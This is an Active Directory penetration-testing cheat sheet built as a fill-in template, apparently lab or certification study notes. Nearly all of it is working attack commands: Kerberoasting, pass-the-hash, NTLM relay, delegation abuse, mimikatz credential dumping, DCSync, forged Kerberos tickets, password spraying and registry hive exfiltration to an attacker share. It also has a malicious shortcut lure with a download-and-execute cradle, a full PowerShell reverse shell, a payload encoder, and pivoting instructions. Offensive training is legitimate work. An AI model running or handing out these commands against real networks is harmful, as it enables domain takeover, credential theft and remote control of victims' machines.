hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# Pass The Hash, you might want to play around with the hash, like use the HASH:HASH version, or just HASH, or even ::HASH
impacket-wmiexec -hashes :<% tp.frontmatter["HASH"] %> <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %>
impacket-psexec -hashes :<% tp.frontmatter["HASH"] %> <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %>
# NTLM Relays
impacket-ntlmrelayx --no-http-server -smb2support -t <% tp.frontmatter["RHOST"] %> -c "whoami"
impacket-ntlmrelayx --no-http-server -smb2support -t <% tp.frontmatter["RHOST"] %> -c "powershell -ep bypass -nop -w hidden -e JABjAGwAaQ..."
# mssql impacket
impacket-mssqlclient <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %> -windows-auth
.\Rubeus.exe asreproast /nowrap
hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u support -p Ironside47pleasure40Watchful --groups 'Remote Management Users'
#crackmapexec
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u 'guest' -p '' --shares
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u 'anonymous' -p '' --shares
#smb password spraying
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %>
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u usernames.txt -p passwords.txt --continue-on-success
crackmapexec smb <% tp.frontmatter["RHOST"] %>/24 -u <% tp.frontmatter["USERNAME"] %> -H <% tp.frontmatter["HASH"] %>:<% tp.frontmatter["HASH"] %> --local-auth
# shares enumeration
crackmapexec smb <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' --shares
# create a new user
impacket-addcomputer -computer-name 'keks_pc$' -computer-pass 'kekeke!!02' -dc-ip <% tp.frontmatter["RHOST"] %> '<% tp.frontmatter["DOMAIN"] %>'/'<% tp.frontmatter["USERNAME"] %>':'<% tp.frontmatter["PASSWORD"] %>'
# add new SPN to the Domain Controller attribute msDS-AllowedToActOnBehalfOfOtherIdentity
# https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
python3 rbcd.py -f KEKS_PC -t DC -dc-ip <% tp.frontmatter["RHOST"] %> '<% tp.frontmatter["DOMAIN"] %>'/'<% tp.frontmatter["USERNAME"] %>':'<% tp.frontmatter["PASSWORD"] %>'
# get ticket using S4U2Self S4U2Proxy
impacket-getST -spn host/dc.<% tp.frontmatter["DOMAIN"] %> -impersonate Administrator -dc-ip <% tp.frontmatter["RHOST"] %> '<% tp.frontmatter["DOMAIN"] %>'/'keks_pc$':'kekeke!!02'
# pass-the-ticket to the final host
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec -k -no-pass support.htb/Administrator@dc.support.htb
ldapsearch -H ldap://<% tp.frontmatter["RHOST"] %> -x -b "dc=hutch,dc=offsec" | grep "sAMAccountName"
# GSSAPI
ldapsearch -x -LLL -b "" -s base supportedSASLMechanisms -H ldap:/windcorp.htb | grep GSSAPI
# if supported then
ldapwhoami -Y GSSAPI -H ldap://windcorp.htb
ldapsearch -LLLY GSSAPI -b 'DC=windcorp,DC=htb' -H ldap://windcorp.htb > scan.txt
https://medium.com/r3d-buck3t/pwning-printers-with-ldap-pass-back-attack-a0d8fa495210 https://blog.openthreatresearch.com/simulating_cve_2021_44228 https://github.com/twelvesec/RogueLDAP
# basic enum
net user /domain
net user /domain <% tp.frontmatter["USERNAME"] %>
net group /domain
net group /domain "Management Department"
# Powershell enum script 1
STARTSCRIPT
# get the hostname of the PDC
# Emit the current domain object (includes the PDC role owner's hostname).
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Bind an ADSI searcher to the PDC at the domain's default naming context.
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)

# 805306368 is the samAccountType of ordinary user accounts; swap in the
# commented filter below to look up a single account by name instead.
$dirsearcher.filter = "samAccountType=805306368"
# $dirsearcher.filter="name=<% tp.frontmatter["USERNAME"] %>"
$result = $dirsearcher.FindAll()

# Dump every property of every match, separating entries with a rule line.
foreach ($obj in $result) {
    foreach ($prop in $obj.Properties) {
        $prop.memberof
        $prop
    }
    Write-Host "-------------------------------"
}
# Powershell enum script 2
# Build the LDAP path of the current domain's naming context on its PDC and
# bind to it with the supplied credentials; the DirectoryEntry is the output.
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
# Turn "corp.com" into "DC=corp,DC=com".
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString = "LDAP://" + $PDC + "/" + $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "<% tp.frontmatter["USERNAME"] %>", "<% tp.frontmatter["PASSWORD"] %>")
# Powershell enum script 3
<#
.SYNOPSIS
    Runs an LDAP query against the current domain's PDC.
.PARAMETER LDAPQuery
    LDAP filter string, e.g. "(samAccountType=805306368)".
.OUTPUTS
    The SearchResultCollection returned by DirectorySearcher.FindAll().
#>
function LDAPSearch {
    param (
        [string]$LDAPQuery
    )
    # Search base: the default naming context, reached through the PDC emulator.
    $pdcHost = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $baseDn = ([adsi]'').distinguishedName
    $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$pdcHost/$baseDn")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($entry, $LDAPQuery)
    return $searcher.FindAll()
}
# USAGE:
powershell -ep bypass
Import-Module .\function.ps1
LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"
# Print the cn and member list of every group object.
LDAPSearch -LDAPQuery "(objectCategory=group)" | ForEach-Object {
    $_.properties | select {$_.cn}, {$_.member}
}
$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Service Personnel*))"
$sales.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))"
$group.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))"
# useful resolve commands
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
Resolve-IPAddress -ComputerName web04
nslookup.exe web04.corp.com
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
# PSTools
.\PsLoggedon.exe \\files04
setspn -L iis_service
# Group Policy
Find-DomainShare (-CheckShareAccess)
# By default, the **SYSVOL** folder is mapped to **%SystemRoot%\SYSVOL\Sysvol\domain-name** on the domain controller and every domain user has access to it.
ls \\dc1.corp.com\sysvol\corp.com\Policies
cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
kali: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
ls \\FILES04\docshare
ls \\FILES04\docshare\docs\do-not-share
cat \\FILES04\docshare\docs\do-not-share\start-email.txt
# wmic , psexec, winrs examples
wmic /node:<% tp.frontmatter["RHOST"] %> /user:<% tp.frontmatter["USERNAME"] %> /password:<% tp.frontmatter["PASSWORD"] %> process call create "cmd.exe"
.\PsExec64.exe -i \\WEB04 -u corp\<% tp.frontmatter["USERNAME"] %> -p <% tp.frontmatter["PASSWORD"] %> cmd
winrs -r:files04 -u:<% tp.frontmatter["USERNAME"] %> -p:<% tp.frontmatter["PASSWORD"] %> "cmd /c hostname & whoami"
# Invoke-CimMethod
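# Create a process on the remote host over DCOM with explicit credentials.
$username = '<% tp.frontmatter["USERNAME"] %>';
$password = '<% tp.frontmatter["PASSWORD"] %>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
# The mis-encoded "ƒcrack-Credential" token is the -Credential parameter; variable
# names are kept in one case so the session/options/command references line up.
$session = New-CimSession -ComputerName <% tp.frontmatter["RHOST"] %> -Credential $credential -SessionOption $options
$command = 'calc';
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $command};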
# WINRM
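# Open an interactive PowerShell Remoting (WinRM) session with explicit credentials.
$username = '<% tp.frontmatter["USERNAME"] %>';
$password = '<% tp.frontmatter["PASSWORD"] %>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
# Keep the session object and enter it directly instead of assuming it got Id 1,
# which is wrong as soon as another session already exists in this runspace.
$session = New-PSSession -ComputerName <% tp.frontmatter["RHOST"] %> -Credential $credential
Enter-PSSession -Session $session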
# DCOM
# Instantiate the MMC20.Application COM class on the remote host via DCOM;
# the returned object exposes the MMC automation model.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<% tp.frontmatter["RHOST"] %>"))
# ExecuteShellCommand(command, directory, parameters, window state) starts a
# program on the remote side.
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
# in the next command, replace the powershell encoded payload with your own
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e 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","7")
#SHARPHOUND
# Run from a domain-joined context. -CollectionMethod All talks to LDAP and to every reachable host
# (sessions, local groups), so it is noisy; the result is a zip in -OutputDirectory for BloodHound to ingest.
Import-Module .\Sharphound.ps1
Get-Help Invoke-BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\anirudh\ -OutputPrefix "corp audit"
# BLOODHOUND KALI
# start the neo4j database BloodHound reads from (credentials are set on first login via http://localhost:7474)
sudo neo4j start
# GUI: log in with the neo4j credentials, then drag the SharpHound zip into the window to import it
bloodhound
# Queries
# Raw Cypher for the BloodHound query window. "RETURN m" draws every matching node, which gets slow on large domains.
# ALL PCs
MATCH (m:Computer) RETURN m
# ALL Users
MATCH (m:User) RETURN m
# All active user sessions
# HasSession edges come from the session-collection step: the user's credentials may be in LSASS on that computer
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
WinRM uses TCP 5985 (HTTP) and 5986 (HTTPS); evil-winrm targets 5985 by default (-P for another port, -S for SSL).
# evil-winrm: PowerShell shell over WinRM. -s points at a directory of .ps1 files that can be loaded by name
# from inside the shell; the password is single-quoted so special characters survive the shell.
evil-winrm -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -i <% tp.frontmatter["RHOST"] %> -s /opt/scripts
# pass-the-hash: -H takes the NT hash only (not LM:NT)
evil-winrm -u <% tp.frontmatter["USERNAME"] %> -H <% tp.frontmatter["HASH"] %> -i <% tp.frontmatter["RHOST"] %> -s /opt/scripts
# same shell, with Empire's situational-awareness scripts as the -s directory
evil-winrm -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -i <% tp.frontmatter["RHOST"] %> -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network
# in shell: file transfer in both directions goes over the WinRM channel itself
upload filename
download filename
# mimikatz one-liners. Each needs local admin plus SeDebugPrivilege (privilege::debug); the binary is heavily
# signatured, expect AV/EDR to react.
# plaintext passwords / NT hashes of logged-on users from LSASS
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# DCSync needs replication rights on the domain and a /user: target (see the dcsync section below)
.\mimikatz.exe "privilege::debug" "lsadump::dcsync" "exit"
# list Kerberos tickets in memory (add /export to write .kirbi files)
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets" "exit"
# kerberos silver tickets, 3 ITEMS
# A silver ticket is a TGS forged with the service account's secret. The DC is never contacted, so it keeps
# working as long as that account's hash is valid; it only grants access to the one service/SPN.
privilege::debug
sekurlsa::logonpasswords
# 1 ITEM: get the hash of a service account iis_service
whoami /user
# 2 ITEM: remove the RID (everything after last -) from SID
# 3 ITEM: target SPN for example web04.corp.com
# pick a user
# /sid = domain SID with RID stripped (lab value, replace it); /rc4 = NT hash of the service account;
# /service must match the SPN class (http); /user can be any name, the service trusts the forged PAC
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:<% tp.frontmatter["DOMAIN"] %> /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:<% tp.frontmatter["USERNAME"] %>
# leave mimikatz; /ptt already injected the ticket, klist in the same session should list it
exit
klist
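# exploiting dcsync
# DCSync asks a DC to replicate secrets. The caller needs DS-Replication-Get-Changes and
# DS-Replication-Get-Changes-All on the domain object (Domain Admins / Enterprise Admins / DCs have them by default).
lsadump::dcsync /user:corp\dave
lsadump::dcsync /user:corp\Administrator
# -m 1000 = NTLM; --force only silences hashcat's device warnings, it does not change results
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# fixed: inside double quotes bash does NOT strip the backslash of "\!", so the original sent the password
# with a literal backslash. Single quotes pass "!" through untouched and still block history expansion.
impacket-secretsdump -just-dc-user dave 'corp.com/jeffadmin:BrouhahaTungPerorateBroom2023!@<% tp.frontmatter["RHOST"] %>'
# lab-specific literal credentials kept as an example
impacket-secretsdump spookysec.local/backup:backup2517860@<% tp.frontmatter["RHOST"] %>
# templated form: -just-dc-ntlm dumps only the NT hashes of every domain account
impacket-secretsdump -just-dc-ntlm <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %>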
# Overpass the hash
# Turn an NT hash into a real Kerberos TGT: sekurlsa::pth starts a process whose logon session carries the
# injected hash; the first Kerberos-authenticated action from it makes the KDC issue a genuine TGT.
privilege::debug
sekurlsa::logonpasswords
# get hash of a user
sekurlsa::pth /user:<% tp.frontmatter["USERNAME"] %> /domain:<% tp.frontmatter["DOMAIN"] %> /ntlm:<% tp.frontmatter["HASH"] %> /run:powershell
# generating TGT (run inside the spawned powershell): touching a share triggers the AS-REQ/TGS-REQ
net use \\web04
# from here on the session holds the user's tickets, so PsExec works without a password
.\PsExec.exe \\web04 cmd
# Pass the Ticket
# Export every ticket held in LSASS (needs local admin + SeDebugPrivilege) and inject one into our own session.
privilege::debug
sekurlsa::tickets /export
# check the .kirbi files in dir
dir *.kirbi
# pick any TGS (file name: [luid]-...-user@service-host.kirbi); this one is dave's CIFS ticket for web04
kerberos::ptt [0;146099]-0-0-40810000-dave@cifs-web04.kirbi
# back in the shell: klist should now list the injected ticket and the share is reachable as dave
klist
net view \\web04
ls \\web04\backup
# Golden Ticket
# on domain controller: dump the krbtgt NT hash (the hash and SID below are lab values, replace both)
privilege::debug
lsadump::lsa /patch
User : krbtgt
LM :
NTLM : 1693c6cefafffc7af11ef34d1c788f47
# on victim: drop existing tickets first so the forged TGT is the one that gets used
kerberos::purge
# The TGT is signed with the krbtgt key, so the DC accepts it for any /user name; it stays valid until the
# krbtgt password has been rotated twice.
kerberos::golden /user:<% tp.frontmatter["USERNAME"] %> /domain:<% tp.frontmatter["DOMAIN"] %> /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
# spawn cmd.exe that inherits the injected ticket
misc::cmd
See also: https://gist.github.com/jivoi/1c8fc3988af2e5b6df0d6cb188514962
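# kerbrute user enumeration via Kerberos AS-REQ: it does not touch the bad-password counter, so it is safe
# with respect to lockouts. -t is the thread count. (Domain now templated like the spray command below.)
./kerbrute_linux_amd64 userenum -d <% tp.frontmatter["DOMAIN"] %> --dc <% tp.frontmatter["RHOST"] %> -t 10 -o /root/validusers.txt /root/userlist.txt
# kerbrute's output lines end with "user@domain" as the last tab-separated field; keep only that
awk -F'\t' '{print $NF}' /root/validusers.txt | sed 's/^[[:space:]]*//' > /root/validusersf.txt
# password spray: ONE password against many users. Every attempt counts toward badPwdCount, so check the
# lockout policy first (net accounts /domain) and stay below the threshold.
./kerbrute_linux_amd64 passwordspray --dc <% tp.frontmatter["RHOST"] %> -t 10 -d <% tp.frontmatter["DOMAIN"] %> /root/users.txt "<% tp.frontmatter["PASSWORD"] %>" -v
# or on victim
.\kerbrute_windows_amd64.exe passwordspray -d <% tp.frontmatter["DOMAIN"] %> .\usernames.txt "<% tp.frontmatter["PASSWORD"] %>"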
Local user hashes are stored in the Windows Registry whilst the computer is running -- specifically in the HKEY_LOCAL_MACHINE\SAM hive. This can also be found as a file at C:\Windows\System32\Config\SAM, however, that file is locked and not readable whilst the computer is running. To dump the hashes locally, we first need to save the SAM hive together with SYSTEM (which holds the boot key needed to decrypt SAM):
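# Unauthenticated SMB share on the attacking box. Anyone on the network can read (and write) it while it is up
# and the hive files cross the wire unencrypted, so stop the server as soon as the copy is done.
impacket-smbserver -smb2support exfiltration /home/harris/
# Get the SAM and SYSTEM files (as admin, or with SeBackupPrivilege, which reg.exe honours for hive saves)
reg.exe save hklm\sam SAM
reg.exe save hklm\security SECURITY
reg.exe save hklm\system SYSTEM
copy SAM \\<% tp.frontmatter["LHOST"] %>\EXFILTRATION\SAM
copy SECURITY \\<% tp.frontmatter["LHOST"] %>\EXFILTRATION\SECURITY
copy SYSTEM \\<% tp.frontmatter["LHOST"] %>\EXFILTRATION\SYSTEM
# decode. Fixed: on Linux the file names are case-sensitive, so they must match the names copied above;
# SECURITY is passed too since it was exfiltrated and yields LSA secrets / cached domain credentials.
pypykatz registry --sam SAM --security SECURITY SYSTEM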
Use: https://github.com/wavestone-cdt/powerpxe
Recovering Credentials from a PXE Boot Image
# PowerPXE: the BCD store and the boot .wim are pulled from the deployment server's TFTP/SMB share;
# the image may embed unattend/bootstrap files that hold domain-join or local admin passwords.
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
# parses the BCD store and reports the path of the boot .wim to fetch next
Get-WimFile -bcdFile $BCDFile
# this way you get a wim file location, then you can use:
# searches the .wim for configuration files containing credentials
Get-FindCredentials -WimFile pxeboot.wim
Use: https://github.com/tothi/rbcd-attack
When a user has GenericAll (or GenericWrite / WriteDACL / write access to msDS-AllowedToActOnBehalfOfOtherIdentity) over the target computer object (here the domain controller), we can configure Resource-Based Constrained Delegation and impersonate any user that is not protected against delegation to that computer's services. Adding our own computer account also requires ms-DS-MachineAccountQuota to be above 0 (default 10).
# first - create a new machine
# (needs ms-DS-MachineAccountQuota > 0; the account is visible in AD, delete it when the engagement ends)
impacket-addcomputer <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> -dc-ip <% tp.frontmatter["RHOST"] %> -hashes :<% tp.frontmatter["HASH"] %> -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
# Now with this newly created machine, I need a way of managing the delegation rights. I can use this rbcd.py script to configure its attribute “msDS-AllowedToActOnBehalfOfOtherIdentity”.
# -t is the target computer object whose attribute is written, -f is our fake computer that gets delegation rights
python3 rbcd.py -dc-ip <% tp.frontmatter["RHOST"] %> -t RESOURCEDC -f 'ATTACK' -hashes :<% tp.frontmatter["HASH"] %> <% tp.frontmatter["DOMAIN"] %>\\<% tp.frontmatter["USERNAME"] %>
# Now all that is left to do is obtain the ticket created of the impersonated Administrator locally and authenticate to the domain controller using this ticket.
# S4U2Self + S4U2Proxy as ATTACK$ for a CIFS service ticket to the DC; the "\$" stops bash from expanding "$:"
impacket-getST -spn cifs/DC.<% tp.frontmatter["DOMAIN"] %> <% tp.frontmatter["DOMAIN"] %>/attack\$:'AttackerPC1!' -impersonate Administrator -dc-ip <% tp.frontmatter["RHOST"] %>
# This will save the ticket locally so export it as such:
export KRB5CCNAME=./Administrator.ccache
# Finally, I can use psexec to connect to the domain controller as the Administrator using local credential file thus spawning a high privileged level shell.
# -k -no-pass uses the ccache; the target must be the DC's FQDN matching the SPN above (add it to /etc/hosts if it does not resolve)
impacket-psexec -k -no-pass DC.<% tp.frontmatter["DOMAIN"] %> -dc-ip <% tp.frontmatter["RHOST"] %>
# Anonymous WebDAV on port 80 serving /root/webdav: anyone on the network can browse it (and write to it unless
# restricted), and every request from the victim is logged here. Take it down when the lure is no longer needed.
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /root/webdav/
# ON PREPARATION MACHINE
# WEBDAV FILE config.Library-ms -- Explorer renders the <url> below as a library folder, so whatever .lnk lures sit in the WebDAV root are what the victim sees
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<% tp.frontmatter["LHOST"] %></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
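# CREATE MALICIOUS LINK WITH FOLLOWING PATH
# (.lnk target; fixed: the original had a stray "1" glued to the IP in "powercat -c" -- the flag takes the bare listener address)
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<% tp.frontmatter["LHOST"] %>/shells/powercat.ps1'); powercat -c <% tp.frontmatter["LHOST"] %> -p <% tp.frontmatter["LPORT"] %> -e powershell"
# Payload1 to download and execute Powercat, need to host powercat:
# (fixed: "IIEX" typo, and the string is now double-quoted so the single quotes around the URL survive; it contains no $ to expand)
PS> $Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://<% tp.frontmatter["LHOST"] %>/shells/powercat.ps1'); powercat -c <% tp.frontmatter["LHOST"] %> -p <% tp.frontmatter["LPORT"] %> -e powershell"
# Payload2: raw TCP reverse shell, nothing downloaded or written to disk
PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",<% tp.frontmatter["LPORT"] %>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# powershell -e expects base64 of the UTF-16LE ("Unicode") bytes of the command
PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText =[Convert]::ToBase64String($Bytes)
PS> $EncodedText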
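import sys
import base64


def encode_powershell(payload: str) -> str:
    """Build a ``powershell ... -e <base64>`` command line for PAYLOAD.

    -EncodedCommand expects base64 of the command's UTF-16LE bytes with no BOM.
    Encoding with 'utf-16le' yields exactly that on any host; the original
    'utf16' codec emits native byte order plus a BOM (hence the old [2:] slice),
    which is only correct on a little-endian machine.
    -nop: no profile, -w hidden: hidden window, -ep bypass: ignore execution policy.
    """
    encoded = base64.b64encode(payload.encode("utf-16le")).decode("ascii")
    return "powershell -nop -w hidden -ep bypass -e " + encoded


# reverse shell over a raw TCP socket to LHOST:LPORT; nothing is written to disk
payload = '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",<% tp.frontmatter["LPORT"] %>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# alternative: fetch and run a dropped binary (this one writes met.exe to disk)
# payload = 'iwr -uri http://<% tp.frontmatter["LHOST"] %>/met.exe -Outfile met.exe;.\\met.exe'
cmd = encode_powershell(payload)

if __name__ == "__main__":
    # optional: take the payload from the command line instead of editing this file
    if len(sys.argv) > 1:
        cmd = encode_powershell(sys.argv[1])
    print(cmd)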
To avoid confusion, some commands in this section keep their literal lab IPs and credentials instead of the template variables.
There are five possible ways to enumerate a network through a compromised host:
Using material found on the machine. The hosts file or ARP cache, for example
Using pre-installed tools
Using statically compiled tools
Using scripting techniques
Using local tools through a proxy
Linux:
arp -a
/etc/hosts
/etc/resolv.conf
nmcli dev show
Win:
arp -a
C:\Windows\System32\drivers\etc\hosts
ipconfig /all
It's worth noting as well that you may encounter hosts which have firewalls blocking ICMP pings (Windows boxes frequently do this, for example). This is likely to be less of a problem when pivoting, however, as these firewalls (by default) often only apply to external traffic, meaning that anything sent through a compromised host on the network should be safe. It's worth keeping in mind, however.
[ProxyList]
# the chain is the list below. Prefer socks5 when the proxy speaks it (ssh -D and chisel both do):
# socks4 is IPv4-only and cannot carry hostnames, so proxy-side DNS resolution does not work through it
socks4 IP_ADDR 1080
Config file search order (the first one found is used):
The current directory (i.e. ./proxychains.conf)
~/.proxychains/proxychains.conf
/etc/proxychains.conf
If performing an Nmap scan through proxychains, this option can cause the scan to hang and ultimately crash. Comment out the proxy_dns line using a hashtag (#) at the start of the line before performing a scan through the proxy!
You can only use TCP scans -- so no UDP or SYN scans. ICMP Echo packets (Ping requests) will also not work through the proxy, so use the -Pn switch to prevent Nmap from trying it.
Forward Connections:
Port forwarding is accomplished with the -L switch, which creates a link to a Local port. For example, if we had SSH access to 172.16.0.5 and there's a webserver running on 172.16.0.10, we could use this command to create a link to the server on 172.16.0.10:
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
Proxies are made using the -D switch, for example: -D 1337. This will open up port 1337 on your attacking box as a proxy to send data through into the protected network. This is useful when combined with a tool such as proxychains. An example of this command would be:
ssh -D 1337 user@172.16.0.5 -fN
Reverse Connections:
Before we can make a reverse connection safely, there are a few steps we need to take:
First, on victim generate a new set of SSH keys and store them somewhere safe (ssh-keygen)
Copy the contents of the public key (the file ending with .pub), then edit the ~/.ssh/authorized_keys file on your own attacking machine. You may need to create the ~/.ssh directory and authorized_keys file first.
On a new line, type the following line, then paste in the public key:
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty
This makes sure that the key can only be used for port forwarding, disallowing the ability to gain a shell on your attacking machine. To tighten it further, prefix `from="PIVOT_IP"` to pin the source address and `permitlisten="PORT"` (OpenSSH 7.8+) to limit which ports the key may open on your box; remove the line from authorized_keys when the engagement ends.
The only thing left is to do the unthinkable: transfer the private key to the target box. This is usually an absolute no-no, which is why we generated a throwaway set of SSH keys to be discarded as soon as the engagement is over.
With the key transferred, we can then connect back with a reverse port forward using the following command:
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
To put that into the context of our fictitious IPs: 172.16.0.10 and 172.16.0.5, if we have a shell on 172.16.0.5 and want to give our attacking box (172.16.0.20) access to the webserver on 172.16.0.10, we could use this command on the 172.16.0.5 machine:
ssh -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -fN
In newer versions of the SSH client, it is also possible to create a reverse proxy (the equivalent of the -D switch used in local connections). This may not work in older clients, but this command can be used to create a reverse proxy in clients which do support it:
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN
# ssh remote portforward
# A = attacker (start sshd), V = victim: connects back and binds 127.0.0.1:4141 on the attacker, relayed to 192.168.246.7:2222
A: sudo systemctl start ssh
V: ssh -N -R 127.0.0.1:4141:192.168.246.7:2222 keks@192.168.45.246
# ssh remote dynamic portforward: the victim offers the attacker a SOCKS proxy on local port 9998 (needs OpenSSH 7.6+)
ssh -N -R 9998 keks@192.168.119.169
add localhost:9998 to proxychains
# -sT and -Pn are mandatory through SOCKS (no raw sockets, no ICMP); -n avoids DNS going through the proxy
proxychains nmap -vvv -sT -p9000-9100 -Pn -n 192.168.169.64
# ssh local portforward
# Binding 0.0.0.0 exposes the forward to every host that can reach this machine; use 127.0.0.1 unless another box must use it.
ssh -N -L 0.0.0.0:9876:0.0.0.0:4646 kali@127.0.0.1
ssh -N -L 0.0.0.0:4455:172.16.169.217:4242 database_admin@10.4.169.215
# --password on the command line ends up in ps output and shell history
smbclient -p 4455 -L //<% tp.frontmatter["RHOST"] %>/ -U hr_admin --password=Welcome1234
# dynamic portforward (same 0.0.0.0 caveat: anyone reaching port 9998 gets a SOCKS proxy into the target network)
ssh -N -D 0.0.0.0:9998 database_admin@10.4.169.215
add host:9998 to attackers proxychains
# plink reverse forward from a Windows pivot. "echo y |" auto-accepts the attacker's SSH host key without verification;
# KEYFILE must be a PuTTY .ppk (convert with puttygen, below). -N: no remote shell.
